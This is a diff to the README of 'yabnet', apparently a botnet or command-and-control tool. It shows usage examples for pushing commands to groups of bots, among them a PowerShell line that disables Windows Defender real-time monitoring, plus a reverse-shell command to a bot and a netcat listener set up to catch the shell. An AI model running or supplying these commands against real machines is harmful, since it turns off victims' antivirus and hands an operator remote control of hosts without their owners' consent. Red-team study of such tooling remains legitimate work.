ChoiSG/yabnet/README.md

 `ex) push -t 1,2,3,4 -c "systemctl stop apache2"`

+`ex) push -t 5,6,7 -c "powershell -c set-mppreference -disablerealtimemonitoring $true"`

 2. Reverse shell command requires the master to open a new console and setup a netcat listener.

 `ex) reverse -t 11 -p 31337`

-`ex) nc -lvnp 31337         // And then for the reverse shell from 10.0.3.4`
+`ex) nc -lvnp 31337         // And then wait for the reverse shell from 10.0.3.4`

-3. The server is hosting files in `/yabnet/server/uploads/` directory.
+3. The server is hosting files in `<somewhere>/yabnet/server/uploads/` directory.

 4. All commands have `-h` help flag available.